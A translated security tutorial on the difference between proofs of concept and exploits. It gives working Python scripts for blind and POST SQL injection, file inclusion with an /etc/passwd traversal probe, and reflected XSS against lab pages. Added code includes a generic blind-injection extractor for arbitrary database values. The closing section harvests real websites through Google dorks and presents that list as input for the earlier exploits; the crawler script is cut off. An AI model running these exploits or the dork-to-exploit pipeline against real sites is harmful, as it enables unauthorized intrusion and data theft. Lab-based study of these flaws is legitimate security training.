2025-01-19 Update From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 06/01 Report
This article introduces the difference between a POC and an EXP in Python. Many people run into this question while working through real cases, so the editor will walk you through how to handle these situations. I hope you read it carefully and take something away from it!
0x00 POC concept
POC (Proof of Concept) literally means "proof of concept". The Baidu Baike definition is: "a proof of concept is test code that confirms that a published vulnerability really exists." Requirements for a POC: it must be deterministic, and it must be able to verify that the vulnerability really exists.
It may be just a small piece of code with a simple function, as long as it can be used to verify that a specific vulnerability, or a class of vulnerabilities, really exists. The bar for writing a POC is not high; the key is understanding the vulnerability itself.
0x01 POC authoring frameworks
A POC framework manages and schedules a large number of POCs and provides a unified programming convention and interface, which makes it a good helper for writing POCs. We only need to write the POC in the format the framework defines and then run it inside the framework.
1. Pocsuite
Pocsuite is the general vulnerability-verification framework of Knownsec's Seebug platform; POCs are written in Python. Submitted POCs earn KB (Seebug's points), which can be exchanged for cash, so it is a decent way to earn some pocket money. Old hands may remember Sebug, the predecessor of Seebug; it was renamed Seebug after Sebug acquired another excellent framework, Beebeeto, in 2016.
2. Tangscan
Tangscan (Tang Dynasty Scanner) is the official framework of the WooYun community; POCs are written in Python. Submitting POCs earns "dumplings" (WooYun's points), which take part in cash dividends.
3. Bugscan
Bugscan is the official framework of Four-Leaf Clover Security (Seclover); POCs are written in Python. Submitting POC plug-ins earns rank rewards that can be exchanged for physical prizes, and the prizes are quite generous.
0x02 The difference between POC and EXP
A POC can be seen as a piece of validation code: evidence that the vulnerability is real.
EXP (Exploit) literally means "vulnerability exploitation"; put simply, an EXP is what turns a vulnerability into something of value. For example, if a system has a SQL injection vulnerability, we can write an EXP that extracts the database version and so on.
Sometimes the two are not easy to tell apart, and exploit code can be added to a POC, as many open-source POC frameworks (such as those listed above) do. Think of it this way: having a POC does not mean you have an EXP, but having an EXP means you have a POC. The first half says that not every vulnerability with a POC can be turned into an effective attack, so an EXP does not necessarily exist. The second half says that a vulnerability that can be used for an effective attack necessarily has an EXP, and the EXP itself proves the vulnerability exists.
0x03 POC and EXP blind-injection exercise: sqli-labs-master
1. Determine how the injection is closed
'''
Boolean-based blind injection: http://192.168.30.164/sqli/Less-5/
Determine whether a single-quote-closed SQL injection exists
Write a POC that returns a yes/no result
'''
import requests

def verify(url):
    payload1 = "?id=1' and 1-- +"      # always-true condition: the page should still say "You are in"
    payload2 = "?id=1' and 1=2-- +"    # always-false condition: the page should not
    resp1 = requests.get(url + payload1)
    resp2 = requests.get(url + payload2)
    text1 = resp1.text
    text2 = resp2.text
    print(text2)
    if ('You are in' in text1) and ('You are in' not in text2):
        print(url, ': single-quote-closed SQL injection present (boolean-based blind)')
    else:
        print(url, ': no single-quote-closed SQL injection (boolean-based blind)')

verify('http://192.168.30.164/sqli/Less-5/')
2. Determine the length of the database name
The longest database name is 64 characters, as is the longest table name, the longest column name and the longest index name.
import requests

def verify(url):
    for i in range(1, 65):   # MySQL identifiers are at most 64 characters (the original loop stopped at 19)
        payload1 = "?id=1' and length(database())={}-- +".format(i)
        resp1 = requests.get(url + payload1)
        text1 = resp1.text
        if 'You are in' in text1:   # true branch: the guessed length is right
            print('database length is: %s' % i)
            break

if __name__ == '__main__':
    url = "http://192.168.30.164/sqli/Less-5/"
    verify(url)
3. Determine the database name
'''
A small EXP exercise.
Boolean-based blind injection: http://192.168.30.164/sqli/Less-5/
Success marker in the page: You are in
'''
import requests

def verify(url, length=8):
    # length comes from the previous step (the sqli-labs database is "security", 8 characters);
    # the original loop used range(1, 8) and therefore never tested the last character
    charset = 'abcdefghijklmnopqrstuvwxyz'   # extend with digits and '_' for names that use them
    name = ''
    for i in range(1, length + 1):
        for j in charset:   # the original indexed the string with range(1, 26) and never tested 'a'
            payload1 = "?id=1' and substr(database(),{},1)='{}'-- +".format(i, j)
            resp1 = requests.get(url + payload1)
            text1 = resp1.text
            if 'You are in' in text1:   # character at position i confirmed
                name += j
                print('database so far: %s' % name)
                break
    print('database is: %s' % name)

if __name__ == '__main__':
    url = "http://192.168.30.164/sqli/Less-5/"
    verify(url)
    # j = input('Please enter the level you want to play: ')
    # verify('http://192.168.30.164/sqli/Less-{}/'.format(j))
    # verify('http://192.168.30.164/sqli/Less-5/')
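The three scripts above test one candidate per request and hard-code the target. The following added example (not code from the article) folds them into the POC/EXP split described in 0x02: verify() is the POC, extract() is the EXP, and extract() reads any SQL expression, not just database(), with a binary search over the character code so that each character costs about seven requests instead of one per candidate. The target is a constructed SQLite-backed stand-in for Less-5 so the script runs offline; http_send() is the assumed swap-in for a live lab URL, and the ord_fn parameter covers the MySQL/SQLite naming difference (ascii() versus unicode()).

```python
# Boolean-based blind SQL injection as POC and EXP: added example, not the article's code.
import sqlite3


class FakeTarget:
    """Constructed stand-in for sqli-labs Less-5 so the script runs offline.

    Like the PHP lab it concatenates the id parameter into the query and shows
    'You are in...' when a row comes back and nothing otherwise (a boolean oracle).
    """

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
        self.db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                            [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])

    def get(self, id_param):
        sql = "SELECT * FROM users WHERE id='%s' LIMIT 1" % id_param   # the vulnerability
        try:
            row = self.db.execute(sql).fetchone()
        except sqlite3.Error:
            return "<h1>error</h1>"
        return "<h1>You are in...........</h1>" if row else "<h1></h1>"


def http_send(base_url):
    """send() for a live target (assumed URL such as http://192.168.30.164/sqli/Less-5/)."""
    import requests   # imported here so the offline demo does not need it

    def send(id_param):
        return requests.get(base_url, params={"id": id_param}).text
    return send


def make_oracle(send, marker="You are in"):
    """Turn 'page text for a given id' into 'is this SQL condition true?'."""
    def ask(condition):
        # 1' closes the quote; '-- ' comments out the rest of the original query
        return marker in send("1' and (%s)-- " % condition)
    return ask


def verify(ask):
    """POC: a true and a false condition must produce different pages."""
    return ask("1=1") and not ask("1=2")


def extract(ask, expr, ord_fn="ascii", max_len=64):
    """EXP: read the value of any SQL expression one character at a time.

    ord_fn returns a character's code: ascii() on MySQL, unicode() on SQLite.
    Binary search on the code needs ~7 requests per character.
    """
    lo, hi = 0, max_len
    while lo < hi:                       # smallest n with length(expr) <= n
        mid = (lo + hi) // 2
        if ask("length((%s))<=%d" % (expr, mid)):
            hi = mid
        else:
            lo = mid + 1
    length = lo
    value = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126                 # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if ask("%s(substr((%s),%d,1))<=%d" % (ord_fn, expr, pos, mid)):
                hi = mid
            else:
                lo = mid + 1
        value += chr(lo)
    return value


if __name__ == "__main__":
    target = FakeTarget()                # swap for make_oracle(http_send(url)) on a real lab
    ask = make_oracle(target.get)
    print("injectable:", verify(ask))
    print("username of id 2:", extract(ask, "(SELECT username FROM users WHERE id=2)", ord_fn="unicode"))
```

Against the real lab you would call extract(ask, "database()") or extract(ask, "version()") with the default ord_fn="ascii"; the same oracle works for any expression the database will evaluate, which is exactly the step from "proving the bug" to "exploiting it".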
0x04 POC exercise for POST-type injection: sqli-labs-master
For POST-type SQL injection you need, in addition to the URL, the values submitted by the form; capture the request with Burp Suite and analyse it. Then pass the form values into the request as key-value pairs in Python.
'''
POST POC
http://192.168.30.164/sqli/Less-11/
'''
import requests

url = "http://192.168.30.164/sqli/Less-11/"
payloads = "admin' or '1' #"   # closes the username quote, makes the WHERE clause true, comments out the rest
response = requests.post(url, data={'uname': payloads, 'passwd': '123'})
html = response.text
print(html)
if 'Your Login name' in html:   # the page prints the logged-in user only when the query returned a row
    print('POST injection present')
0x05 POC exercise for file inclusion
File inclusion:
Local file inclusion (LFI), for example http://127.0.0.1/1/lfi.php?file=phpinfo.txt
Remote file inclusion (RFI): requires allow_url_include to be enabled (it is off by default); the payload is file=http://<remote file address>
'''
File inclusion POC
http://127.0.0.1/1/lfi.php?file=phpinfo.txt
'''
import requests

def verify(url):
    payload = '?file=phpinfo.txt'
    response = requests.get(url + payload)
    html_str = response.text
    if 'PHP Version' in html_str:   # the included file was executed as PHP and printed phpinfo()
        print('local file inclusion present')
    else:
        print('not present')

if __name__ == '__main__':
    verify(url="http://127.0.0.1/1/lfi.php")
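Seeing "PHP Version" only shows that the parameter selects what gets included; the stronger evidence is reading a file outside the web root. The following added example (not the article's code) puts the vulnerable include() logic next to a hardened version and runs a POC with both probes over each. The web root, the allow-list and the "disk" are constructed stand-ins so it runs offline, allow_url_include is assumed off in both versions (so the RFI case is not simulated), and http_send() is the assumed swap-in for a live lfi.php.

```python
# File inclusion: vulnerable and hardened include() logic plus a two-probe POC.
# Added example, not the article's code. The file system and web root are constructed.
import posixpath

WEBROOT = "/var/www/html/1"              # assumed directory of lfi.php
ALLOWED = {"phpinfo.txt", "home.txt"}    # assumed allow-list used by the hardened version

FAKE_FS = {                              # constructed stand-in for the server's disk
    "/var/www/html/1/phpinfo.txt": "<html>PHP Version 7.4.3 ...</html>",
    "/var/www/html/1/home.txt": "welcome",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n",
}


def resolve(file_param):
    """Resolve the parameter the way include() would, relative to the script directory."""
    return posixpath.normpath(posixpath.join(WEBROOT, file_param))


def include_vulnerable(file_param):
    """Mirrors include($_GET['file']): whatever resolves gets included."""
    path = resolve(file_param)
    return FAKE_FS.get(path, "Warning: include(%s): failed to open stream" % file_param)


def include_hardened(file_param):
    """Only allow-listed files that resolve inside the web root are included."""
    path = resolve(file_param)
    if not path.startswith(WEBROOT + "/") or posixpath.basename(path) not in ALLOWED:
        return "Warning: include(): refused"
    return FAKE_FS.get(path, "Warning: include(%s): failed to open stream" % file_param)


# (payload, marker that proves the include happened, what the hit shows)
PROBES = [
    ("phpinfo.txt", "PHP Version", "the parameter selects the included file"),
    ("../../../../etc/passwd", "root:x:0:0", "directory traversal outside the web root"),
]


def verify(send):
    """POC: return the findings for a send(file_param) -> page text function."""
    findings = []
    for payload, marker, what in PROBES:
        if marker in send(payload):
            findings.append(what)
    return findings


def http_send(base_url):
    """send() for a live target such as http://127.0.0.1/1/lfi.php (assumed)."""
    import requests   # imported here so the offline demo does not need it

    def send(file_param):
        return requests.get(base_url, params={"file": file_param}).text
    return send


if __name__ == "__main__":
    print("vulnerable:", verify(include_vulnerable))
    print("hardened:  ", verify(include_hardened))
```

The hardened version normalises the path before checking it, so "phpinfo.txt/../../etc/passwd" is rejected as well; the traversal probe is the one that separates "the parameter is used in an include" from "an attacker can read arbitrary files".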
0x06 POC exercise for XSS
XSS is the most common vulnerability class after SQL injection. Its categories are reflected XSS, stored XSS and DOM XSS.
What XSS can do:
Worms
Steal cookies
Obtain the victim's real IP (JavaScript cannot do this on its own)
Identify the software installed on the user's machine
XSS phishing
Screenshots
Keystroke logging
Read the browser's history
Intranet scanning
'''
XSS (cross-site scripting) attack
Pop-up test payload:
http://127.0.0.1/1/xss.php?title=%3C/title%3E%3Cscript%3Ealert(123)%3C/script%3E
'''
import requests
import re

def POC():
    # send the payload from the comment above; the original sent only "alert(123)" and then searched
    # for that string, which also matches an HTML-encoded (harmless) reflection
    payload = '</title><script>alert(123)</script>'
    response = requests.get('http://127.0.0.1/1/xss.php', params={'title': payload})
    res = response.text
    if re.search(r'<script>alert\(123\)</script>', res):   # the tag came back unencoded
        return True
    else:
        return False

if __name__ == '__main__':
    print(POC())
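A reflected-XSS POC must distinguish the payload coming back as live markup from the same payload coming back HTML-encoded; a search for "alert(123)" cannot tell them apart. The following added example (not the article's code) shows that difference: the two page functions are constructed stand-ins for xss.php, one echoing the parameter raw and one escaping it, and http_send() is the assumed swap-in for the real URL.

```python
# Reflected XSS POC that separates a raw reflection from an HTML-encoded one.
# Added example, not the article's code; page_vulnerable/page_hardened are constructed stand-ins.
import html

PAYLOAD = '</title><script>alert(123)</script>'   # the article's pop-up payload

TEMPLATE = "<html><head><title>%s</title></head><body>results</body></html>"


def page_vulnerable(title):
    """Mirrors echoing $_GET['title'] straight into the <title> element."""
    return TEMPLATE % title


def page_hardened(title):
    """Same page with the parameter HTML-encoded before output."""
    return TEMPLATE % html.escape(title, quote=True)


def poc(send, payload=PAYLOAD):
    """send(title) -> page text. Reports how the payload was reflected."""
    body = send(payload)
    return {
        "reflected_raw": payload in body,                              # tags survive: exploitable
        "reflected_encoded": html.escape(payload, quote=True) in body, # tags neutralised
        "naive_check": "alert(123)" in body,                           # true in both cases
    }


def http_send(base_url):
    """send() for a live target such as http://127.0.0.1/1/xss.php (assumed)."""
    import requests   # imported here so the offline demo does not need it

    def send(title):
        return requests.get(base_url, params={"title": title}).text
    return send


if __name__ == "__main__":
    print("vulnerable:", poc(page_vulnerable))
    print("hardened:  ", poc(page_hardened))
```

Only reflected_raw should count as a finding; naive_check is true for the hardened page too, which is the false positive the article's original string search would have produced.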
0x07 Google search syntax: find sites that may contain injection points with inurl:php?id=1
Google search operators:
site: restrict the search to a domain.
inurl: search for strings contained in the URL; useful for finding search pages, help pages and the like.
intext: search only the body text of the page (ignoring the title, URL, etc.).
intitle: restrict the search to page titles; pages whose title contains a keyword are often used when social-engineering webshell passwords.
filetype: search by file suffix or extension.
link: list all pages that link to the specified URL.
2. Google syntax with simulated clicks
'''
Selenium crawler
1. Obtain URLs of the form php?id=1 in batches through Google syntax
2. Save the URLs to a file: urls.txt
'''
from selenium import webdriver
import time
import re

# # headless mode
# chrome_option =
driver = webdriver.Chrome(r'G:\python\file\chromedriver.exe')   # create the Chrome browser object and open Chrome
driver.get('https://www.google.com/search?q=inurl:php?id=1')
for i in range(10):
    time.sleep(1.5)
    driver.execute_script('window.scrollTo(0, document.body.scrollHeight)')   # scroll to the bottom to load more results
html_str = driver.page_source   # get the page source
# data parsing
# test = driver.find_element_by_xpath('//a[@id="pnnext"]/span[2]')
pattern = re.compile('
(The regular expression and the rest of the script are cut off in the source.)
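The parsing step the script stops at (pull the result links out of page_source, keep the ones matching php?id=, drop duplicates and the search engine's own navigation, and write urls.txt) is shown in the following added example, which is not the article's code. The result page it parses is a constructed snippet, not a real Google response; feed it the html_str from the Selenium script instead.

```python
# Extract candidate injection URLs from a saved search-result page and write urls.txt.
# Added example, not the article's code; RESULT_PAGE is constructed, not a real Google response.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

RESULT_PAGE = """
<div><a href="http://example.com/news.php?id=12">News</a></div>
<div><a href="https://shop.example.org/item.php?id=7&amp;lang=en">Item</a></div>
<div><a href="http://example.com/news.php?id=12">News (duplicate)</a></div>
<div><a href="https://www.google.com/search?q=inurl:php?id=1&amp;start=10">Next</a></div>
<div><a href="http://example.net/about.html">About</a></div>
"""


class LinkCollector(HTMLParser):
    """Collect every href on the page (attribute values come back already unescaped)."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def candidate_urls(page_source, pattern=r"\.php\?id=\d+"):
    """Unique links matching the dork pattern, skipping the search engine's own links."""
    parser = LinkCollector()
    parser.feed(page_source)
    seen, out = set(), []
    for link in parser.links:
        if urlparse(link).netloc.endswith("google.com"):   # pagination and other Google links
            continue
        if re.search(pattern, link) and link not in seen:
            seen.add(link)
            out.append(link)
    return out


def save_urls(urls, path="urls.txt"):
    """Write one URL per line; the file is the input list for the POCs in the earlier sections."""
    with open(path, "w") as f:
        f.write("\n".join(urls) + "\n")
    return path


if __name__ == "__main__":
    urls = candidate_urls(RESULT_PAGE)   # replace RESULT_PAGE with the Selenium html_str
    print(save_urls(urls), urls)
```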